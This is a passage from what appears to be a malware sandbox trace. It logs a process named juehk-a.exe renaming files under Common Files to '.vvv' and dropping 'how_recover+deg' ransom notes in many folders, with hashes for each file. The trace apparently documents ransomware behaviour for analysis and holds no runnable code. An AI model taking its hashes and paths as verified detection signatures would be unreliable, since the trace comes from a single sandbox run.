14271.          fid (ads:): 562949953495999
14272.          ntstatus: 0x0
14273.          CreateOptions: 0x60
14274.        file:
14275.          timestamp: 73456
14276.          mode: close
14277.          sequenceNumber: 1016
14278.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
14279.          filesize: 1486
14280.          md5sum: 5c6bafaa69d0fed20a975a47af8588a5
14281.          sha1sum: a85e430f942cece7a97a440eea8c674ffdd6ad9c
14282.          processinfo:
14283.            pid: 1648
14284.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14286.            ads:
14287.          fid (ads:): 562949953495999
14288.          ntstatus: 0x0
14289.          CreateOptions: 0x0
14290.        file:
14291.          timestamp: 73470
14292.          mode: rename
14293.          sequenceNumber: 1017
14294.          filesize: 1486
14295.          md5sum: 5c6bafaa69d0fed20a975a47af8588a5
14296.          sha1sum: a85e430f942cece7a97a440eea8c674ffdd6ad9c
14297.          processinfo:
14298.            pid: 1648
14299.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14300.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14301.          old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
14302.          new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG.vvv
14303.            ads:
14304.          fid (ads:): 562949953495999
14305.          ntstatus: 0x0
14306.          CreateOptions: 0x0
14307.        file:
14308.          timestamp: 73477
14309.          mode: open
14310.          sequenceNumber: 1018
14311.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
14312.          filesize: 1682
14313.          processinfo:
14314.            pid: 1648
14315.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14316.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14317.            ads:
14318.          fid (ads:): 562949953496000
14319.          ntstatus: 0x0
14320.          CreateOptions: 0x60
14321.        file:
14322.          timestamp: 73812
14323.          mode: close
14324.          sequenceNumber: 1019
14325.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
14326.          filesize: 2110
14327.          md5sum: 91ea306138d0ffd0c06c0830cd478b1f
14328.          sha1sum: 30ff39edb672dc9719632c07c960f0d90103111a
14329.          processinfo:
14330.            pid: 1648
14331.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14332.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14333.            ads:
14334.          fid (ads:): 562949953496000
14335.          ntstatus: 0x0
14336.          CreateOptions: 0x0
14337.        file:
14338.          timestamp: 73842
14339.          mode: rename
14340.          sequenceNumber: 1020
14341.          filesize: 2110
14342.          md5sum: 91ea306138d0ffd0c06c0830cd478b1f
14343.          sha1sum: 30ff39edb672dc9719632c07c960f0d90103111a
14344.          processinfo:
14345.            pid: 1648
14346.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14347.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14348.          old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
14349.          new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG.vvv
14350.            ads:
14351.          fid (ads:): 562949953496000
14352.          ntstatus: 0x0
14353.          CreateOptions: 0x0
14354.        file:
14355.          timestamp: 73875
14356.          mode: created
14357.          sequenceNumber: 1021
14358.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.txt
14359.          processinfo:
14360.            pid: 1648
14361.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14362.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14363.            ads:
14364.          fid (ads:): 3096224743898678
14365.          ntstatus: 0x0
14366.          CreateOptions: 0x60
14367.        file:
14368.          timestamp: 73880
14369.          mode: close
14370.          sequenceNumber: 1022
14371.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.txt
14372.          filesize: 2673
14373.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14374.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14375.          processinfo:
14376.            pid: 1648
14377.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14378.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14379.            ads:
14380.          fid (ads:): 3096224743898678
14381.          ntstatus: 0x0
14382.          CreateOptions: 0x0
14383.        file:
14384.          timestamp: 73889
14385.          mode: created
14386.          sequenceNumber: 1023
14387.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.html
14388.          processinfo:
14389.            pid: 1648
14390.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14391.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14392.            ads:
14393.          fid (ads:): 562949953521101
14394.          ntstatus: 0x0
14395.          CreateOptions: 0x60
14396.        file:
14397.          timestamp: 73893
14398.          mode: close
14399.          sequenceNumber: 1024
14400.          value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.html
14401.          filesize: 9480
14402.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14403.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14404.          processinfo:
14405.            pid: 1648
14406.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14407.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14408.            ads:
14409.          fid (ads:): 562949953521101
14410.          ntstatus: 0x0
14411.          CreateOptions: 0x0
14412.        file:
14413.          timestamp: 73947
14414.          mode: created
14415.          sequenceNumber: 1025
14416.          value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.txt
14417.          processinfo:
14418.            pid: 1648
14419.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14420.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14421.            ads:
14422.          fid (ads:): 562949953521102
14423.          ntstatus: 0x0
14424.          CreateOptions: 0x60
14425.        file:
14426.          timestamp: 73953
14427.          mode: close
14428.          sequenceNumber: 1026
14429.          value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.txt
14430.          filesize: 2673
14431.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14432.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14433.          processinfo:
14434.            pid: 1648
14435.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14436.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14437.            ads:
14438.          fid (ads:): 562949953521102
14439.          ntstatus: 0x0
14440.          CreateOptions: 0x0
14441.        file:
14442.          timestamp: 73960
14443.          mode: created
14444.          sequenceNumber: 1027
14445.          value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.html
14446.          processinfo:
14447.            pid: 1648
14448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14450.            ads:
14451.          fid (ads:): 562949953521103
14452.          ntstatus: 0x0
14453.          CreateOptions: 0x60
14454.        file:
14455.          timestamp: 73965
14456.          mode: close
14457.          sequenceNumber: 1028
14458.          value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.html
14459.          filesize: 9480
14460.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14461.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14462.          processinfo:
14463.            pid: 1648
14464.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14465.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14466.            ads:
14467.          fid (ads:): 562949953521103
14468.          ntstatus: 0x0
14469.          CreateOptions: 0x0
14470.        file:
14471.          timestamp: 73979
14472.          mode: created
14473.          sequenceNumber: 1029
14474.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.txt
14475.          processinfo:
14476.            pid: 1648
14477.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14478.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14479.            ads:
14480.          fid (ads:): 562949953521104
14481.          ntstatus: 0x0
14482.          CreateOptions: 0x60
14483.        file:
14484.          timestamp: 73985
14485.          mode: close
14486.          sequenceNumber: 1030
14487.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.txt
14488.          filesize: 2673
14489.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14490.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14491.          processinfo:
14492.            pid: 1648
14493.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14494.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14495.            ads:
14496.          fid (ads:): 562949953521104
14497.          ntstatus: 0x0
14498.          CreateOptions: 0x0
14499.        file:
14500.          timestamp: 73991
14501.          mode: created
14502.          sequenceNumber: 1031
14503.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.html
14504.          processinfo:
14505.            pid: 1648
14506.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14507.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14508.            ads:
14509.          fid (ads:): 562949953521105
14510.          ntstatus: 0x0
14511.          CreateOptions: 0x60
14512.        file:
14513.          timestamp: 73997
14514.          mode: close
14515.          sequenceNumber: 1032
14516.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.html
14517.          filesize: 9480
14518.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14519.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14520.          processinfo:
14521.            pid: 1648
14522.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14523.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14524.            ads:
14525.          fid (ads:): 562949953521105
14526.          ntstatus: 0x0
14527.          CreateOptions: 0x0
14528.        file:
14529.          timestamp: 74003
14530.          mode: created
14531.          sequenceNumber: 1033
14532.          value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.txt
14533.          processinfo:
14534.            pid: 1648
14535.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14537.            ads:
14538.          fid (ads:): 562949953521106
14539.          ntstatus: 0x0
14540.          CreateOptions: 0x60
14541.        file:
14542.          timestamp: 74009
14543.          mode: close
14544.          sequenceNumber: 1034
14545.          value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.txt
14546.          filesize: 2673
14547.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14548.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14549.          processinfo:
14550.            pid: 1648
14551.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14552.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14553.            ads:
14554.          fid (ads:): 562949953521106
14555.          ntstatus: 0x0
14556.          CreateOptions: 0x0
14557.        file:
14558.          timestamp: 74017
14559.          mode: created
14560.          sequenceNumber: 1035
14561.          value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.html
14562.          processinfo:
14563.            pid: 1648
14564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14566.            ads:
14567.          fid (ads:): 562949953521107
14568.          ntstatus: 0x0
14569.          CreateOptions: 0x60
14570.        file:
14571.          timestamp: 74021
14572.          mode: close
14573.          sequenceNumber: 1036
14574.          value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.html
14575.          filesize: 9480
14576.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14577.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14578.          processinfo:
14579.            pid: 1648
14580.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14581.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14582.            ads:
14583.          fid (ads:): 562949953521107
14584.          ntstatus: 0x0
14585.          CreateOptions: 0x0
14586.        file:
14587.          timestamp: 74036
14588.          mode: created
14589.          sequenceNumber: 1037
14590.          value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.txt
14591.          processinfo:
14592.            pid: 1648
14593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14595.            ads:
14596.          fid (ads:): 562949953521108
14597.          ntstatus: 0x0
14598.          CreateOptions: 0x60
14599.        file:
14600.          timestamp: 74042
14601.          mode: close
14602.          sequenceNumber: 1038
14603.          value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.txt
14604.          filesize: 2673
14605.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14606.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14607.          processinfo:
14608.            pid: 1648
14609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14611.            ads:
14612.          fid (ads:): 562949953521108
14613.          ntstatus: 0x0
14614.          CreateOptions: 0x0
14615.        file:
14616.          timestamp: 74050
14617.          mode: created
14618.          sequenceNumber: 1039
14619.          value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.html
14620.          processinfo:
14621.            pid: 1648
14622.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14624.            ads:
14625.          fid (ads:): 562949953521109
14626.          ntstatus: 0x0
14627.          CreateOptions: 0x60
14628.        file:
14629.          timestamp: 74057
14630.          mode: close
14631.          sequenceNumber: 1040
14632.          value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.html
14633.          filesize: 9480
14634.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14635.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14636.          processinfo:
14637.            pid: 1648
14638.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14639.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14640.            ads:
14641.          fid (ads:): 562949953521109
14642.          ntstatus: 0x0
14643.          CreateOptions: 0x0
14644.        file:
14645.          timestamp: 74065
14646.          mode: created
14647.          sequenceNumber: 1041
14648.          value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.txt
14649.          processinfo:
14650.            pid: 1648
14651.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14653.            ads:
14654.          fid (ads:): 562949953521110
14655.          ntstatus: 0x0
14656.          CreateOptions: 0x60
14657.        file:
14658.          timestamp: 74072
14659.          mode: close
14660.          sequenceNumber: 1042
14661.          value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.txt
14662.          filesize: 2673
14663.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14664.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14665.          processinfo:
14666.            pid: 1648
14667.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14668.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14669.            ads:
14670.          fid (ads:): 562949953521110
14671.          ntstatus: 0x0
14672.          CreateOptions: 0x0
14673.        file:
14674.          timestamp: 74079
14675.          mode: created
14676.          sequenceNumber: 1043
14677.          value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.html
14678.          processinfo:
14679.            pid: 1648
14680.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14682.            ads:
14683.          fid (ads:): 562949953521111
14684.          ntstatus: 0x0
14685.          CreateOptions: 0x60
14686.        file:
14687.          timestamp: 74085
14688.          mode: close
14689.          sequenceNumber: 1044
14690.          value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.html
14691.          filesize: 9480
14692.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14693.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14694.          processinfo:
14695.            pid: 1648
14696.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14697.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14698.            ads:
14699.          fid (ads:): 562949953521111
14700.          ntstatus: 0x0
14701.          CreateOptions: 0x0
14702.        file:
14703.          timestamp: 74094
14704.          mode: created
14705.          sequenceNumber: 1045
14706.          value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.txt
14707.          processinfo:
14708.            pid: 1648
14709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14711.            ads:
14712.          fid (ads:): 562949953521112
14713.          ntstatus: 0x0
14714.          CreateOptions: 0x60
14715.        file:
14716.          timestamp: 74101
14717.          mode: close
14718.          sequenceNumber: 1046
14719.          value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.txt
14720.          filesize: 2673
14721.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14722.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14723.          processinfo:
14724.            pid: 1648
14725.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14726.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14727.            ads:
14728.          fid (ads:): 562949953521112
14729.          ntstatus: 0x0
14730.          CreateOptions: 0x0
14731.        file:
14732.          timestamp: 74117
14733.          mode: created
14734.          sequenceNumber: 1047
14735.          value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.html
14736.          processinfo:
14737.            pid: 1648
14738.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14739.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14740.            ads:
14741.          fid (ads:): 562949953521113
14742.          ntstatus: 0x0
14743.          CreateOptions: 0x60
14744.        file:
14745.          timestamp: 74123
14746.          mode: close
14747.          sequenceNumber: 1048
14748.          value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.html
14749.          filesize: 9480
14750.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14751.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14752.          processinfo:
14753.            pid: 1648
14754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14756.            ads:
14757.          fid (ads:): 562949953521113
14758.          ntstatus: 0x0
14759.          CreateOptions: 0x0
14760.        file:
14761.          timestamp: 74130
14762.          mode: created
14763.          sequenceNumber: 1049
14764.          value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.txt
14765.          processinfo:
14766.            pid: 1648
14767.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14768.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14769.            ads:
14770.          fid (ads:): 562949953521114
14771.          ntstatus: 0x0
14772.          CreateOptions: 0x60
14773.        file:
14774.          timestamp: 74136
14775.          mode: close
14776.          sequenceNumber: 1050
14777.          value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.txt
14778.          filesize: 2673
14779.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14780.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14781.          processinfo:
14782.            pid: 1648
14783.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14784.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14785.            ads:
14786.          fid (ads:): 562949953521114
14787.          ntstatus: 0x0
14788.          CreateOptions: 0x0
14789.        file:
14790.          timestamp: 74143
14791.          mode: created
14792.          sequenceNumber: 1051
14793.          value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.html
14794.          processinfo:
14795.            pid: 1648
14796.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14797.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14798.            ads:
14799.          fid (ads:): 562949953521115
14800.          ntstatus: 0x0
14801.          CreateOptions: 0x60
14802.        file:
14803.          timestamp: 74148
14804.          mode: close
14805.          sequenceNumber: 1052
14806.          value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.html
14807.          filesize: 9480
14808.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14809.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14810.          processinfo:
14811.            pid: 1648
14812.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14814.            ads:
14815.          fid (ads:): 562949953521115
14816.          ntstatus: 0x0
14817.          CreateOptions: 0x0
14818.        file:
14819.          timestamp: 74259
14820.          mode: failed
14821.          sequenceNumber: 1053
14822.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi
14823.          processinfo:
14824.            pid: 1648
14825.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14826.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14827.            ads:
14828.          fid (ads:): 0
14829.          failure: open
14830.          ntstatus: 0xc0000022
14831.          CreateOptions: 0x60
14832.        file:
14833.          timestamp: 74264
14834.          mode: failed
14835.          sequenceNumber: 1054
14836.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi
14837.          processinfo:
14838.            pid: 1648
14839.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14840.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14841.            ads:
14842.          fid (ads:): 0
14843.          failure: open
14844.          ntstatus: 0xc0000022
14845.          CreateOptions: 0x60
14846.        file:
14847.          timestamp: 74284
14848.          mode: failed
14849.          sequenceNumber: 1055
14850.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi
14851.          processinfo:
14852.            pid: 1648
14853.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14854.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14855.            ads:
14856.          fid (ads:): 0
14857.          failure: open
14858.          ntstatus: 0xc0000022
14859.          CreateOptions: 0x60
14860.        file:
14861.          timestamp: 74291
14862.          mode: failed
14863.          sequenceNumber: 1056
14864.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi
14865.          processinfo:
14866.            pid: 1648
14867.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14868.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14869.            ads:
14870.          fid (ads:): 0
14871.          failure: open
14872.          ntstatus: 0xc0000022
14873.          CreateOptions: 0x60
14874.        file:
14875.          timestamp: 74297
14876.          mode: failed
14877.          sequenceNumber: 1057
14878.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi
14879.          processinfo:
14880.            pid: 1648
14881.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14882.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14883.            ads:
14884.          fid (ads:): 0
14885.          failure: open
14886.          ntstatus: 0xc0000022
14887.          CreateOptions: 0x60
14888.        file:
14889.          timestamp: 74304
14890.          mode: failed
14891.          sequenceNumber: 1058
14892.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi
14893.          processinfo:
14894.            pid: 1648
14895.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14896.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14897.            ads:
14898.          fid (ads:): 0
14899.          failure: open
14900.          ntstatus: 0xc0000022
14901.          CreateOptions: 0x60
14902.        file:
14903.          timestamp: 74341
14904.          mode: failed
14905.          sequenceNumber: 1059
14906.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi
14907.          processinfo:
14908.            pid: 1648
14909.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14911.            ads:
14912.          fid (ads:): 0
14913.          failure: open
14914.          ntstatus: 0xc0000022
14915.          CreateOptions: 0x60
14916.        file:
14917.          timestamp: 74405
14918.          mode: failed
14919.          sequenceNumber: 1060
14920.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi
14921.          processinfo:
14922.            pid: 1648
14923.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14925.            ads:
14926.          fid (ads:): 0
14927.          failure: open
14928.          ntstatus: 0xc0000022
14929.          CreateOptions: 0x60
14930.        file:
14931.          timestamp: 74554
14932.          mode: created
14933.          sequenceNumber: 1061
14934.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.txt
14935.          processinfo:
14936.            pid: 1648
14937.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14939.            ads:
14940.          fid (ads:): 562949953521116
14941.          ntstatus: 0x0
14942.          CreateOptions: 0x60
14943.        file:
14944.          timestamp: 74560
14945.          mode: close
14946.          sequenceNumber: 1062
14947.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.txt
14948.          filesize: 2673
14949.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
14950.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
14951.          processinfo:
14952.            pid: 1648
14953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14955.            ads:
14956.          fid (ads:): 562949953521116
14957.          ntstatus: 0x0
14958.          CreateOptions: 0x0
14959.        file:
14960.          timestamp: 74566
14961.          mode: created
14962.          sequenceNumber: 1063
14963.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.html
14964.          processinfo:
14965.            pid: 1648
14966.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14967.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14968.            ads:
14969.          fid (ads:): 562949953521117
14970.          ntstatus: 0x0
14971.          CreateOptions: 0x60
14972.        file:
14973.          timestamp: 74572
14974.          mode: close
14975.          sequenceNumber: 1064
14976.          value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.html
14977.          filesize: 9480
14978.          md5sum: a68c3caf0be8f1a393c697136926cfd4
14979.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
14980.          processinfo:
14981.            pid: 1648
14982.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14983.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14984.            ads:
14985.          fid (ads:): 562949953521117
14986.          ntstatus: 0x0
14987.          CreateOptions: 0x0
14988.        file:
14989.          timestamp: 74578
14990.          mode: created
14991.          sequenceNumber: 1065
14992.          value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.txt
14993.          processinfo:
14994.            pid: 1648
14995.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
14996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
14997.            ads:
14998.          fid (ads:): 562949953521118
14999.          ntstatus: 0x0
15000.          CreateOptions: 0x60
15001.        file:
15002.          timestamp: 74584
15003.          mode: close
15004.          sequenceNumber: 1066
15005.          value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.txt
15006.          filesize: 2673
15007.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15008.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15009.          processinfo:
15010.            pid: 1648
15011.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15012.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15013.            ads:
15014.          fid (ads:): 562949953521118
15015.          ntstatus: 0x0
15016.          CreateOptions: 0x0
15017.        file:
15018.          timestamp: 74590
15019.          mode: created
15020.          sequenceNumber: 1067
15021.          value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.html
15022.          processinfo:
15023.            pid: 1648
15024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15026.            ads:
15027.          fid (ads:): 562949953521119
15028.          ntstatus: 0x0
15029.          CreateOptions: 0x60
15030.        file:
15031.          timestamp: 74596
15032.          mode: close
15033.          sequenceNumber: 1068
15034.          value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.html
15035.          filesize: 9480
15036.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15037.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15038.          processinfo:
15039.            pid: 1648
15040.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15041.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15042.            ads:
15043.          fid (ads:): 562949953521119
15044.          ntstatus: 0x0
15045.          CreateOptions: 0x0
15046.        file:
